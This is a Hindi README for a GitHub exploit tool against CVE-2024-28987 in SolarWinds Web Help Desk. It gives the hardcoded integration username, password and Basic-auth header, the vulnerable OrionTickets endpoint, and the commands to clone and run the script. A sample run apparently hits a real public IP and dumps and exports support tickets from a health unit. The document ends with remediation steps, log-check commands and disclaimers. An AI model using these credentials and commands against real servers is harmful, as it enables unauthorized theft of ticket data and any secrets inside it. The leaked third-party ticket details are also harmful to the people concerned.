
**CVE-2024-28987** SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को **हार्डकोडेड क्रेडेंशियल्स** का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का **CVSS स्कोर 9.1 (गंभीर)** है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।
⚠️ अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
CVE-2024-28987 SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को हार्डकोडेड क्रेडेंशियल्स का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का CVSS स्कोर 9.1 (गंभीर) है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2024-28987 |
| CVSS स्कोर | 9.1 (गंभीर) |
| CWE | CWE-798 (हार्डकोडेड क्रेडेंशियल्स) |
| प्रभावित उत्पाद | SolarWinds Web Help Desk ≤ 12.8.3 हॉटफिक्स 1 |
| पैच किया गया संस्करण | 12.8.3 हॉटफिक्स 2 |
| शोषण | वास्तविक दुनिया में सक्रिय रूप से शोषित |
| CISA KEV में जोड़ा गया | 15 अक्टूबर, 2024 |
एक अनधिकृत हमलावर यह कर सकता है:
/OrionTickets एंडपॉइंट के माध्यम से टिकटों पर CRUD संचालन कर सकता है# रिपॉजिटरी क्लोन करें
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# स्क्रिप्ट को निष्पादन योग्य बनाएं
उपयोग
bash
# तर्क के रूप में लक्ष्य URL के साथ
python3 cve-2024-28987.py http://target-ip:port
# इंटरैक्टिव मोड (लक्ष्य के लिए संकेत देगा)
python3 cve-2024-28987.py
# कमजोर लक्ष्य के साथ उदाहरण
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 आउटपुट उदाहरण
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ हार्डकोडेड क्रेडेंशियल्स भेद्यता ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] जाँच की जा रही है: http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] लक्ष्य कमजोर है!
[+] 42 टिकट मिले
======================================================================
[📋] टिकट पूर्वावलोकन (पहले 3 टिकट)
======================================================================
टिकट #1
├── ID: 5690
├── ग्राहक: UBS Portao Vermelho
├── स्थिति: खुला
├── विवरण: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
टिकट #2
├── ID: 5691
├── ग्राहक: UBS Centro
├── स्थिति: प्रगति पर
├── विवरण: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] संवेदनशील डेटा के लिए स्कैनिंग
======================================================================
[!] टिकट #5723 में संभावित PASSWORD डेटा मिला
└── विवरण: कृपया सिस्टम एक्सेस के लिए मेरा पासवर्ड रीसेट करें...
[?] क्या आप सभी टिकटों को फ़ाइल में निकालना चाहते हैं? [y/N]: y
[*] सहेजा जा रहा है: 138_94_193_65_8098_tickets.json
[✓] 138_94_193_65_8098_tickets.json सफलतापूर्वक सहेजा गया
[*] फ़ाइल आकार: 42,847 बाइट्स
[*] कुल टिकट: 42
[*] हो गया!
GitHub: https://github.com/Darabium
📁 फ़ाइल संरचना
CVE-2024-28987/
├── cve-2024-28987.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह फ़ाइल
└── LICENSE # MIT लाइसेंस
आउटपुट फ़ाइलें
जब आप टिकट निकालते हैं, तो निम्नलिखित फ़ाइलें बनाई जाती हैं:
138_94_193_65_8098_tickets.json
***_tickets.jsonl 🔍 तकनीकी विवरण हार्डकोडेड क्रेडेंशियल्स python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" प्रभावित एंडपॉइंट text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ नमूना HTTP अनुरोध http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ उपचार तत्काल कार्रवाई SolarWinds Web Help Desk संस्करण 12.8.3 हॉटफिक्स 2 या बाद के संस्करण में तुरंत अपडेट करें
/OrionTickets एंडपॉइंट तक संदिग्ध पहुंच के लिए लॉग जांचें
टिकट डेटा तक अनधिकृत पहुंच की निगरानी करें
टिकटों में उजागर हो सकने वाले सभी क्रेडेंशियल्स रीसेट करें
संभावित डेटा रिसाव के लिए सभी समर्थन टिकटों की समीक्षा करें
पहचान कमांड bash
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
cat /opt/WebHelpDesk/version.txt 🚨 CISA KEV सलाह इस भेद्यता को CISA की ज्ञात शोषित भेद्यताओं (KEV) सूची में जोड़ा गया है। संगठनों को निर्दिष्ट समय सीमा तक पैच करना आवश्यक है।
जोड़ने की तिथि: 15 अक्टूबर, 2024
आवश्यक कार्रवाई: विक्रेता निर्देशों के अनुसार अपडेट लागू करें
समय सीमा: 5 नवंबर, 2024 (21 दिन)
📚 संदर्भ NVD CVE-2024-28987
CISA KEV कैटलॉग
SolarWinds सुरक्षा सलाह
PEP 668 - बाहरी पर्यावरण प्रबंधन
🤝 योगदान योगदान का स्वागत है! कृपया बेझिझक पुल अनुरोध सबमिट करें या मुद्दे खोलें।
दिशानिर्देश रिपॉजिटरी को फोर्क करें
अपनी फीचर शाखा बनाएं (git checkout -b feature/AmazingFeature)
अपने परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
शाखा को पुश करें (git push origin feature/AmazingFeature)
पुल अनुरोध खोलें
📝 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
⚡ लेखक Darabium - प्रारंभिक कार्य - GitHub
⚠️ महत्वपूर्ण नोट यह टूल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है
उन सिस्टमों पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है
लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है
हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
अपने क्षेत्राधिकार में गोपनीयता और डेटा सुरक्षा कानूनों का सम्मान करें
🌟 स्टार इतिहास यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर ⭐ दें!
📞 समर्थन बग रिपोर्ट के लिए GitHub पर एक मुद्दा खोलें
सुरक्षा चिंताओं के लिए, कृपया GitHub के माध्यम से सीधे संपर्क करें
Darabium के लिए ❤️ के साथ बनाया गया